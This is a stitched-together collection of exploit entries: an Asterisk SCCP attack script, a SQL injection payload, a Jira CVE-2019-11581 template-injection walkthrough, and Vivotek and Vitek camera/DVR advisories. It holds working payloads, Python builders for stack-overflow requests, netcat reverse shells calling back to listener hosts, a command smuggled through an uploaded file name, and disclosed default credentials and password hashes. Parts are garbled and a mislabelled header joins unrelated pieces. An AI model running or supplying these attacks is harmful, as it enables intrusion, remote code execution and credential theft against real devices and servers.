# Filename: pool/main/a/asterisk/asterisk_13.17.2~dfsg-2_i386.deb
#
# Example usage: python asteriskSCCP.py 192.168.1.1 2000
import binascii
import sys
import socket
import time

def asteriskSCCP(target,port):
    try:
        while 1:
            # Open socket
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # Set reuse ON
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            # Connect to the target SCCP port
            s.connect((target, port))
            print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Connected to: {} {}".format(target, port))
            print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Establishing connection.. ")
            packet = binascii.unhexlify(b'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')
            # Log the packet in hex with a timestamp (the log file is rewritten on every iteration)
            fileLog = target + ".log"
            logPacket = open(fileLog, "w+")
            logPacket.write("["+time.strftime('%a %H:%M:%S')+"]"+ " - Packet sent: " + binascii.hexlify(bytes(packet))+"\n")
            logPacket.close()
            # Write the bytes to the socket
            print("["+time.strftime('%a %H:%M:%S')+"]"+" - "+"Packet sent: ")
            s.send(bytes(packet))
            # Packet sent:
            print(bytes(packet))
            try:
                data = s.recv(4096)
                print("[" + time.strftime('%a %H:%M:%S') + "]" + " - "+ "Data received: '{msg}'".format(msg=data))
            except socket.error as e:
                print 'Sorry, No data available'
                continue
            s.close()
    except socket.error as error:
        print error
        print "Sorry, something went wrong!"

def howtouse():
    print "Usage: AsteriskSCCP.py Hostname Port"
    print "[*] Mandatory arguments:"
    print "[-] Specify a hostname / port"
    sys.exit(-1)

if __name__ == "__main__":
    try:
        # Set target
        target = sys.argv[1]
        port = int(sys.argv[2])
        print "[*] Asterisk 13.17 Exploit by Juan Sacco <jsacco@exploitpack.com "
        asteriskSCCP(target, port)
    except IndexError:
        howtouse()
# Exploit Title: Online Test Script 2.0.7 - 'cid' SQL Injection
# Dork: N/A
# Date: 2018-02-07
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://www.phpscriptsmall.com/product/online-test-script/
# Version: 2.0.7
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands through the 'cid' GET parameter.
# # # # #
# Proof of Concept :
SQLi:
# server/login.php?normal&cid=[SQL]
# Parameter : cid (GET)
# Type: UNION QUERY
# Title: Generic UNION query (NULL) - 5 columns
# payload : /*!00000UNION*/ ALL SELECT NULL,/*!00000Concat('L0RD',0x3C62723E,version(),0x3C62723E,user(),0x3C62723E,database())*/,/*!00000group_coNcat(0x3C62723E,table_name,0x3a,column_name)*/,NULL,NULL /*!00000from*/ information_schema.columns where table_schema=schema()%23
Test :
http://server/login.php?normal&cid=-2%20/*!00000UNION*/%20ALL%20SELECT%20NULL,/*!00000Concat(%27L0RD%27,0x3C62723E,version(),0x3C62723E,user(),0x3C62723E,database())*/,/*!00000group_coNcat(0x3C62723E,table_name,0x3a,column_name)*/,NULL,NULL%20/*!00000from*/%20information_schema.columns%20where%20table_schema=schema()%23
0x00脆弱性の説明
Atlassian Jiraは、Atlassian Australiaの欠陥追跡管理システムです。このシステムは、主に仕事のさまざまな問題や欠陥を追跡および管理するために使用されます。
Atlassian Jira ServerとJira Data Centerには、サーバー側のテンプレートインジェクションの脆弱性があります。この脆弱性をうまく活用する攻撃者は、JIRAサーバーまたはJIRAデータセンターの影響を受けたバージョンを実行しているサーバー上で任意のコマンドを実行し、サーバーの権限を取得し、ネットワーク資産を真剣に危険にさらすことができます。
0x01 CVE番号
CVE-2019-11581
0x02脆弱性ハザードレベル
高リスク
0x03脆弱性衝撃範囲
Atlassianjira 4.4.xatlassianjira 5.x.xatlassianjira 6.x.xatlassianjira 7.0.x
Atlassianjira 7.1.x
Atlassianjira 7.2.xatlassianjira 7.3.xatlassianjira 7.4.xatlassianjira 7.5.5.xatlassianjira 7.6.x 7.6.14.x 7.6.14.xatlassianjira 7.8.xatlassianjira 7.9.xatlassianjira 7.10.xatlasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslasslass 7.11.xatlassianjira 7.12.xatlassianjira 7.13.x 7.13.5atlassianjira 8.0.x 8.0.3atlassianjira 8.1.x 8.1.2atlassianjira 8.2.x 8.2.33
0x04 Vulnerability analysis
1. Preconditions for exploitation. The first scenario is unauthenticated code execution: Jira must have an SMTP server configured and the "Contact Website Administrators Form" must be enabled. (In fact, judging from the web interface, the form cannot be enabled at all unless an SMTP server has been configured.)
The second scenario requires Jira administrator privileges, which are harder to obtain, so the first case is analysed here. The root cause is that the ContactAdministrators action (atlassian-jira/WEB-INF/classes/com/atlassian/jira/web/action/ContactAdministrators) does not filter the Subject field of the message, so a subject supplied by the user is rendered as a template (Velocity) and its directives are executed. In both scenarios, an attacker who successfully exploits the vulnerability can execute arbitrary commands on the system running the affected version of Jira Server or Jira Data Center.
2. Two URLs can be used to verify the vulnerability. The first requires no administrator account: http://10.206.1.8:8080/Secure/ContactAdministrators!default.jspa
The second requires an administrator account: http://10.206.1.8:8080/secure/admin/sendbulkmail!default.jspa
If the version displayed is one of the affected versions listed above, the instance is vulnerable.
0x05 Reproduction
1. Condition: the Contact Administrators form must be enabled (you need to know the back-end administrator account and password to configure it).
2. Environment: Atlassian Jira v7.13.0 (used as the example; this version is vulnerable). Download address:
https://product-downloads.atlassian.com/software/jira/downloads/atlassian-jira-software-7.13.0-x64.exe
The installation itself is not described here (as the installer prompts, first register an account on the vendor site, obtain a trial license key and then install). Note that after the e-mail configuration step (the default), go on to the back-end configuration.
3. To confirm that the vulnerability exists without logging in, visit the following URL (no administrator privileges required):
http://10.206.1.83:8080/secure/contactAdministrators!default.jspa
If the page shows the following prompt, the vulnerability cannot be triggered until the form has been configured:
Log in to the back-end and enable Contact Administrators. The configuration address is:
http://10.10.20.116:8080/secure/admin/editapplicationproperties!default.jspa
It is off by default. Before switching it on, SMTP must be configured so that mail can be sent. Once SMTP is configured the connection can be tested; the server must have port 25 open, otherwise mail cannot be sent. The figure below shows the form successfully enabled.
4. Triggering the vulnerability without logging in. Visit:
http://10.206.1.83:8080/secure/contactAdministrators!default.jspa
Enter the payload in the Subject field. Since the environment here is a Windows machine, a local account is added so the result can be observed; on Linux, code such as a reverse shell can be used instead. Either way, replace the command with the one you want executed.
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('net user bk abc@abc123 /add')
The message goes into the mail queue, so wait a while after submitting. Then run net user on the server: the account created by the executed command is listed.
5. Triggering the vulnerability from an administrator account. Log in as administrator, then visit the following URL:
http://10.206.1.83:8080/secure/admin/sendbulkmail!default.jspa
Enter the payload; the command runs and adds an account, as follows:
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('net user bk01 abc@abc123 /add')
Executable under Linux:
PoC executable against the target Jira system
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://www.baidu.com')
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('bash -i >& /dev/tcp/attacker_IP/2333 0>&1')
On the attacker host run: nc -lvvp 2333
Note that Runtime.exec(String) does not go through a shell: it splits the string on whitespace and runs the first token as the program, so the >& and 0>&1 redirections in the bash one-liner above are handed to bash as arguments rather than interpreted. To run it as written, pass the whole command line to a shell (for example the String[] form of exec with {"bash","-c","..."}) or use an encoding of the command that needs no shell metacharacters.
0x06 Remediation
1. Temporary mitigation. If Jira cannot be upgraded in time, the following mitigations can be applied:
1. Disable access to http://IP:port/secure/ContactAdministrators!default.jspa
2. Turn off the Contact Website Administrators Form. The steps are:
Settings > System > Edit Settings > Contact Administrators Form: select Off, then click Update at the bottom to save the settings.
Edit Settings
Close the Contact Website Administrators Form
2. Remediation. 1. Upgrade to a version that is not affected by the vulnerability.
2. Restrict access to http://IP:port/secure/admin/sendbulkmail!default.jspa by source IP.
0x07 References
https://MP.WEIXIN.QQ.COM/S/D2YVSYRZXPZRPCAKMQARSW
https://mp.weixin.qqq.com/s/_tsq9p1pqyszjt2vaxd61a
https://paper.seebug.org/982/
https://www.jiansshu.com/p/ddf1233d333f
https://github.com/jas502n/cve-2019-11581
http://byximcx.cn/post-158.html
[STX]
Subject: Vivotek IP Cameras - Remote Stack Overflow
Researcher: bashis <mcw noemail eu> (September-October 2017)
PoC: https://github.com/mcw0/PoC
Release date: November 13, 2017
Full Disclosure: 43 days
Attack Vector: Remote
Authentication: Anonymous (no credentials needed)
Firmware Vulnerable: Only 2017 versions affected
Firmware Patched: October 2017 and higher
Device Model:
CC8160, CC8370, CC8371, CD8371, FD8166A, FD8166A, FD8166A-N, FD8167A, FD8167A, FD8167AS,
FD8167AS, FD8169A, FD8169A, FD8169A, FD8169AS, FD8169AS, FD816B, FD816B, FD816BA, FD816BA,
FD816C, FD816C, FD816CA, FD816CA, FD816D, FD8177, FD8179, FD8182, FD8182, FD8182-F1,
FD8365A_v2, FD8367A, FD8367A, FD8369A, FD8369A, FD836B, FD836BA, FD836D, FD8377, FD8379,
FD8382, FD9171, FD9181, FD9371, FD9381, FE8174_v2, FE8181_v2, FE8182, FE8374_v2, FE8381_v2,
FE9181, FE9182, FE9381, FE9382, IB8367A, IB8369A, IB836B, IB836BA, IB836D, IB8377,
IB8379, IB8382, IB9371, IB9381, IP8166, IP9171, IP9181, IZ9361, MD8563, MD8564,
MD8565, SD9161, SD9361, SD9362, SD9363, SD9364, SD9365, SD9366, VC8101... and possibly more
Download Updated Firmware: http://www.vivotek.com/firmware/
[Timeline]
October 1, 2017: Reported findings with all details to Vivotek Cybersecurity
October 2, 2017: First response from Vivotek
October 5, 2017: ACK of findings from Vivotek
October 11, 2017: Vivotek reported first fixed Firmware
October 12, 2017: After request, Vivotek provided samples of fixed Firmware
October 17, 2017: Verified fixed Firmware, Vivotek thanking for the help
October 30, 2017: Noticed new Firmware released, pinged to get some info about their advisory
November 1, 2017: Agreed on publication November 13, 2017
November 9, 2017: Checked a few release notes, none mention a security fix; pinged Vivotek with the question why not.
November 13, 2017: No reply from Vivotek, Full Disclosure as planned.
[Details]
Vivotek uses a modified version of Boa/0.94.14rc21, and the vulnerability was introduced by Vivotek's modifications, not by upstream Boa.
The stack overflow is triggered by a "PUT" or "POST" request:
[PUT|POST] /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n
However, the absolutely minimal request that still triggers the overflow is odd, most probably the result of a quick hack in the parser: the request line can be dropped entirely and the method name can run straight into the header name:
"[PUT|POST]Content-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n"
This allows [JUNK] made of 'good bytes' to be inserted at two places, up to the 9182-byte (0x1FFF) request limit:
"[PUT|POST][JUNK]Content-Length[JUNK]:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n"
Notes:
1. B to I land in $R4-$R11; X lands in $PC
2. The size of the request is available in $R3 at the LDMFD (compare r3 in the register dumps below: 0x75 and 0x4f, the lengths of the two PoC requests)
3. Max request size: 9182 bytes (0x1FFF); note that 0x1FFF is 8191 decimal, so the two figures do not agree
4. The leading "\n" of the "\n\r\n\r\n" terminator is needed to jump to a 0x00xxxxxx address (without it $PC ends up as 0x0dxxxxxx)
5. A space (0x20) after ':' in 'Content-Length:' counts as one of the 20 garbage bytes
6. The stack is not protected with stack canaries
7. Good bytes: 0x01-0x09, 0x0b-0xff; bad bytes: 0x00, 0x0a
8. Heap: non-executable + non-ASLR
9. Stack: non-executable + ASLR
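The notes above fix the whole layout: 20 bytes of filler after "Content-Length:", eight words that land in R4..R11, the word that lands in PC, then the terminator. The following is an added example, not the advisory's PoC script, that assembles such a request from a register layout, refuses the two bad bytes (0x00, 0x0a) in any attacker-chosen part, enforces the 0x1FFF limit, and reads the register values back out of a finished request for comparison with the gdb dumps. Sending a 0x00xxxxxx PC as three bytes, with the terminator's leading "\n" standing in for the high 0x00 byte, is this example's reading of Note 4 rather than something the advisory spells out; the register values and the 0x188f4 target address (the lr seen in the dumps) are placeholders.

```python
"""Assemble the Vivotek upgrade.cgi overflow request from a register layout.

Added example; not the advisory's PoC. The 3-byte PC form is an assumption
drawn from Note 4.
"""
import struct

BAD_BYTES = {0x00, 0x0a}
MAX_REQUEST = 0x1FFF
FILLER_LEN = 20                       # bytes between "Content-Length:" and R4
TERMINATOR = b"\n\r\n\r\n"
REQUEST_LINE = b" /cgi-bin/admin/upgrade.cgi HTTP/1.0\n"


def check_good(data: bytes, what: str) -> None:
    """Raise if `data` contains a byte the parser would truncate on."""
    bad = sorted({b for b in data if b in BAD_BYTES})
    if bad:
        raise ValueError("%s contains bad byte(s) %s" % (what, ["0x%02x" % b for b in bad]))


def pack_pc(pc: int) -> bytes:
    """PC word; a 0x00xxxxxx address is sent as 3 bytes, the '\\n' after it supplies the 0x00."""
    word = struct.pack("<I", pc)
    if word[3] == 0x00:
        word = word[:3]
    check_good(word, "pc")
    return word


def pc_usable(pc: int) -> bool:
    """True when `pc` can be delivered without a bad byte."""
    try:
        pack_pc(pc)
        return True
    except ValueError:
        return False


def build_request(regs, pc, method=b"POST", junk=b"", minimal=False, filler=b"A" * FILLER_LEN):
    """regs: eight ints for R4..R11 in order. Returns the raw bytes to send to TCP/80."""
    if len(regs) != 8:
        raise ValueError("need exactly 8 register values (R4..R11)")
    if len(filler) != FILLER_LEN:
        raise ValueError("filler must be %d bytes" % FILLER_LEN)
    for data, what in ((junk, "junk"), (filler, "filler")):
        check_good(data, what)
    body = b"".join(struct.pack("<I", r) for r in regs)
    check_good(body, "registers")
    if minimal:
        # "[PUT|POST][JUNK]Content-Length[JUNK]:" form: no request line at all
        head = method + junk + b"Content-Length" + junk + b":"
    else:
        head = method + REQUEST_LINE + b"Content-Length:"
    request = head + filler + body + pack_pc(pc) + TERMINATOR
    if len(request) > MAX_REQUEST:
        raise ValueError("request is %d bytes, limit is 0x%X" % (len(request), MAX_REQUEST))
    return request


def predicted_registers(request: bytes) -> dict:
    """Read back what the overflow puts in R4..R11 and PC (compare with the gdb dumps)."""
    colon = request.index(b":", request.index(b"Content-Length"))  # junk must not contain ':'
    body = colon + 1 + FILLER_LEN
    regs = struct.unpack("<8I", request[body:body + 32])
    tail = request[body + 32:]
    if not tail.endswith(TERMINATOR):
        raise ValueError("terminator missing")
    pc_bytes = tail[:-len(TERMINATOR)].ljust(4, b"\x00")
    out = {"r%d" % (4 + i): v for i, v in enumerate(regs)}
    out["pc"] = struct.unpack("<I", pc_bytes)[0]
    return out


if __name__ == "__main__":
    # The advisory's own crash pattern: R4..R11 = BBBB..IIII, PC = XXXX
    crash = build_request([0x42424242, 0x43434343, 0x44444444, 0x45454545,
                           0x46464646, 0x47474747, 0x48484848, 0x49494949], 0x58585858)
    print(crash)
    print(predicted_registers(crash))
```

The default call reproduces the first PoC request byte for byte (117 bytes, the 0x75 seen in r3); with minimal=True and a PUT method it produces the second form. Because the stack is non-executable and ASLR'd while the binary's own addresses start with 0x00, the 3-byte PC path is the one that matters for a real return-to-code target.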
[PoC]
$ echo -en "POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80
(gdb) target remote 192.168.57.20:23946
Remote debugging using 192.168.57.20:23946
0x76eb2c5c in ?? ()
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb) bt
#0 0x58585858 in ?? ()
#1 0x000188f4 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) i reg
r0 0x1 1
r1 0x47210 291344
r2 0x0 0
r3 0x75 117
r4 0x42424242 1111638594
r5 0x43434343 1128481603
r6 0x44444444 1145324612
r7 0x45454545 1162167621
r8 0x46464646 1179010630
r9 0x47474747 1195853639
r10 0x48484848 1212696648
r11 0x49494949 1229539657
r12 0x1 1
sp 0x7e92dac0 0x7e92dac0
lr 0x188f4 100596
pc 0x58585858 0x58585858
cpsr 0x60000010 1610612752
(gdb)
$ echo -en "PUTContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80
(gdb) target remote 192.168.57.20:23946
Remote debugging using 192.168.57.20:23946
0x76e82c5c in ?? ()
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb) bt
#0 0x58585858 in ?? ()
#1 0x000188f4 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) i reg
r0 0x1 1
r1 0x47210 291344
r2 0x0 0
r3 0x4f 79
r4 0x42424242 1111638594
r5 0x43434343 1128481603
r6 0x44444444 1145324612
r7 0x45454545 1162167621
r8 0x46464646 1179010630
r9 0x47474747 1195853639
r10 0x48484848 1212696648
r11 0x49494949 1229539657
r12 0x1 1
sp 0x7ec9cac0 0x7ec9cac0
lr 0x188f4 100596
pc 0x58585858 0x58585858
cpsr 0x60000010 1610612752
(gdb)
Have a nice day
/bashis
[ETX]
[STX]
Subject: Vitek RCE and Information Disclosure (and possibly other OEMs)
Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (December 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 22, 2017
Full Disclosure: 0-day
heap: Executable + Non-ASLR
stack: Executable + ASLR
-[Manufacturer Logo]-
[ASCII-art logo not reproduced]
-[OEM (found in the code)]-
Vitek (http://www.vitekcctv.com/) - Verified: VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R
Thrive
Wisecon
Sanyo
Inodic
CBC
Elbex
Y3K
KTNC
-[Stack Overflow RCE]-
[Reverse netcat shell]
$ echo -en "GET /dvrcontrol.cgi?nc\x24\x7bIFS\x7d192.168.57.1\x24\x7bIFS\x7d31337\x24\x7bIFS\x7d-e\x24\x7bIFS\x7dsh\x24\x7bIFS\x7d HTTP/1.0\r\nAuthorization Pwned: `for((i=0;i<272;i++)); do echo -en "A";done`\x80\x9a\x73\x02\xc8\x4a\x11\x20\r\n\r\n"|ncat 192.168.57.20 81
[Listener]
$ ncat -vlp 31337
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: E672 0A5B B852 8EF9 36D0 E979 2827 1FAD 7482 8A7B
Ncat: Listening on :::31337
Ncat: Listening on 0.0.0.0:31337
Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:36356.
pwd
/opt/fw
whoami
root
exit
$
Note:
1. Bad bytes: 0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20
2. 0x20 is rewritten to 0x00 by the H4/H1/N1 binary before the overflow; use this to deliver a 0x00-prefixed address without sending a 0x00 byte, and jump to the binary's own system() call site: 0x00114AC8 [the SUB/MOV/BL system sequence in H4]
3. 0x02739A0C + 0x74 = the $R11 value we need (0x02739A80): the call site computes $R0 = $R11 - 0x74, so this makes system()'s argument point at our command string on the heap
H1:
VT-HDOC4E_Firmware_1.21A_UI_1.1.C.6
.rodata:005292E8 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:001CD138 SUB R3, R11, #0x74
.text:001CD13C MOV R0, R3
.text:001CD140 BL system
H4:
VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R
.rodata:00B945A0 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:00114AC8 SUB R3, R11, #0x74
.text:00114ACC MOV R0, R3
.text:00114AD0 BL system
N1:
VT-HDOC8E_Firmware_1.21E_UI_1.1.C.6
.rodata:004A4AC4 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:001E9F0C SUB R3, R11, #0x74
.text:001E9F10 MOV R0, R3
.text:001E9F14 BL system
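The three notes and the three disassembly listings above are enough to derive the last eight bytes of the PoC request. The following is an added example, not the researcher's PoC script, that turns them into code: spaces in the command become ${IFS} (0x20 is a bad byte, and the CGI argument would be split on it anyway); each 0x00 in an address is sent as 0x20 so that the binary's rewrite turns it back into 0x00; and R11 is the heap address of the command string plus 0x74, undoing the "SUB R3, R11, #0x74" that feeds system()'s argument. The call-site addresses and the 0x02739A0C heap address are the advisory's H4/H1/N1 values and the 272-byte padding is the advisory's count; the listener IP and port are placeholders.

```python
"""Derive the Vitek dvrcontrol.cgi overflow tail and the space-free command.

Added example; addresses are the advisory's, listener IP/port are placeholders.
"""
import struct

BAD_BYTES = {0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20}
PAD_LEN = 272                        # header-value bytes before the saved R11
FRAME_OFFSET = 0x74                  # from "SUB R3, R11, #0x74"
SYSTEM_CALLSITE = {                  # "SUB R3, R11, #0x74 / MOV R0, R3 / BL system"
    "H1": 0x001CD138,
    "H4": 0x00114AC8,
    "N1": 0x001E9F0C,                # low byte 0x0c is itself a bad byte: needs another entry point
}
CMD_HEAP_ADDR_H4 = 0x02739A0C        # where the command string sits on the heap (H4, advisory)


def ifs_encode(cmd: str) -> str:
    """'nc 10.0.0.1 31337 -e sh' -> 'nc${IFS}10.0.0.1${IFS}31337${IFS}-e${IFS}sh'."""
    return "${IFS}".join(cmd.split(" "))


def pack_word(addr: int) -> bytes:
    """Little-endian word with each 0x00 sent as 0x20; the binary turns it back into 0x00."""
    raw = struct.pack("<I", addr)
    if 0x20 in raw:
        raise ValueError("0x%08x contains a real 0x20 byte, which the binary would turn into 0x00" % addr)
    word = bytes(0x20 if b == 0x00 else b for b in raw)
    bad = sorted({b for b in word if b in BAD_BYTES and b != 0x20})
    if bad:
        raise ValueError("0x%08x needs bad byte(s) %s" % (addr, ["0x%02x" % b for b in bad]))
    return word


def address_usable(addr: int) -> bool:
    """True when the address survives the bad-byte list after the 0x20 trick."""
    try:
        pack_word(addr)
        return True
    except ValueError:
        return False


def overflow_tail(cmd_addr: int, model: str = "H4") -> bytes:
    """Saved R11 then saved PC: the last eight bytes of the 'Authorization Pwned:' value."""
    r11 = cmd_addr + FRAME_OFFSET            # so that R0 = R11 - 0x74 == cmd_addr
    return pack_word(r11) + pack_word(SYSTEM_CALLSITE[model])


def build_request(cmd: str, cmd_addr: int = CMD_HEAP_ADDR_H4, model: str = "H4",
                  pad_len: int = PAD_LEN) -> bytes:
    """Full request: command in the query string, overflow in a bogus header, as in the PoC."""
    query = ifs_encode(cmd) + "${IFS}"       # trailing ${IFS} as in the advisory's request
    value = b"A" * pad_len + overflow_tail(cmd_addr, model)
    return (b"GET /dvrcontrol.cgi?" + query.encode("ascii") + b" HTTP/1.0\r\n"
            + b"Authorization Pwned: " + value + b"\r\n\r\n")


if __name__ == "__main__":
    req = build_request("nc 192.168.57.1 31337 -e sh")
    print(req)
    print("tail:", overflow_tail(CMD_HEAP_ADDR_H4).hex())   # 809a7302c84a1120
```

For H4 the tail comes out as 80 9a 73 02 c8 4a 11 20, the same eight bytes that close the echo command in the PoC. The N1 entry illustrates why the bad-byte list must be checked per firmware: its call-site address ends in 0x0c, which the parser will not pass through, so a different gadget has to be chosen for that build.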
-[PHP RCE]-
Note: /mnt/usb2 must be mounted read/write (normally it is read-only unless a USB stick is inserted)
[Reverse netcat shell (forking)]
$ curl -v 'http://192.168.57.20:80/cgi-bin/php/htdocs/system/upload_check.php' -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1337" -d "`echo -en "\r\n\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n100000000\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"\|\|nc\$\{IFS\}\$\{REMOTE_ADDR\}\$\{IFS\}31337\$\{IFS\}-e\$\{IFS\}sh\$\{IFS\}\&\$\{IFS\}\|\|\"\r\nContent-Type: application/gzip\r\n\r\nPWNED\r\n\r\n------WebKitFormBoundary1337--\r\n\r\n"`" -X POST
200 OK
[...]
> ERROR : Current_fw_info File Open Error<br>> ERROR : dvr_upgrade File Open Error<br>F/W File(||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||) Upload Completed.<br>If you want to upgrade please click START button<br><br><form enctype="multipart/form-data" action="fw_update.php" method="post"><input type="hidden" name="PHPSESSID" value="67eaa14441089e5d2e7fe6ff0fa88d42" /><input type="submit" value="START"></form> </tbody>
[...]
[Listener]
$ ncat -vlp 31337
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 76D3 7FA3 396A B9F6 CCA6 CEA5 2EF8 06DF FF72 79EF
Ncat: Listening on :::31337
Ncat: Listening on 0.0.0.0:31337
Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:52726.
pwd
/opt/www/htdocs/system
whoami
nobody
ls -l /mnt/usb2/
total 4
drwxrwxrwx 2 nobody nobody 0 Dec 16 02:55 dvr
-rw------- 1 nobody nobody 7 Dec 16 02:55 ||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||
exit
$
-[Login / Password Disclosure]-
curl -v "http://192.168.57.20:80/menu.env" | hexdump -C
[binary config; the admin login/password and the credentials of all connected cameras can be found in it]
Admin l/p
[...]
00001380 00 00 00 00 01 01 00 01 01 01 01 00 00 00 00 00 |................|
00001390 00 00 00 00 00 41 44 4d 49 4e 00 00 00 00 00 00 |.....ADMIN......|
000013a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00001400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 32 |..............12|
00001410 33 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |34..............|
00001420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
Cameras l/p
[...]
00008d80 00 00 00 00 c0 00 a8 00 01 00 15 00 92 1f 00 00 |................|
00008d90 91 1f 00 00 72 6f 6f 74 00 00 00 00 00 00 00 00 |....root........|
00008da0 00 00 00 00 70 61 73 73 00 00 00 00 00 00 00 00 |....pass........|
00008db0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00008dc0 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 a8 00 |................|
00008dd0 01 00 16 00 94 1f 00 00 93 1f 00 00 72 6f 6f 74 |............root|
00008de0 00 00 00 00 00 00 00 00 00 00 00 00 70 61 73 73 |............pass|
00008df0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
-[Hardcoded l/p]-
FTP: TCP/10021
TELNET: TCP/10023
/etc/passwd
root:$1$5LFGqGq.$fUozHRdzvapI2qBf1EeoJ0:0:0:root:/root:/bin/sh
woody:$1$e0vY7A0V$BjS38SsHNWC5DxEGlzuEP1:1001:100:woohyun digital user:/home/woody:/bin/sh
-[Korean hardcoded DNS]-
$ cat /etc/resolv.conf
nameserver 168.126.63.1
nameserver 0.0.0.0
nameserver 0.0.0.0
$
$ nslookup 168.126.63.1
1.63.126.168.in-addr.arpa name = kns.kornet.net.
$ nslookup 168.126.63.2
2.63.126.168.in-addr.arpa name = kns2.kornet.net.
-[Other Information Disclosure]-
curl -v "http://192.168.57.20:80/webviewer/netinfo.dat"
192,168,57,20
192,168,2,100
00:0A:2F:XX:XX:XX
00:0A:2F:YY:YY:YY
255.255.255.0
192.168.57.1
-[MAC Address Details]-
Company: Artnix Inc.
Address: Seoul 137-819, KOREA, REPUBLIC OF
Range: 00:0A:2F:00:00:00 - 00:0A:2F:FF:FF:FF
Type: IEEE MA-L
curl -v "http://192.168.57.20:80/webviewer/gw.dat"
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
192.168.2.0 0.0.0.0 255.255.255.0 U 0 0 0 eth1
192.168.57.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
0.0.0.0 192.168.57.1 0.0.0.0 UG 0 0 0 eth0
curl -v "http://192.168.57.20:80/cgi-bin/php/lang_change.php?lang=0"
Change GUI Language to English
[... and more]
[ETX]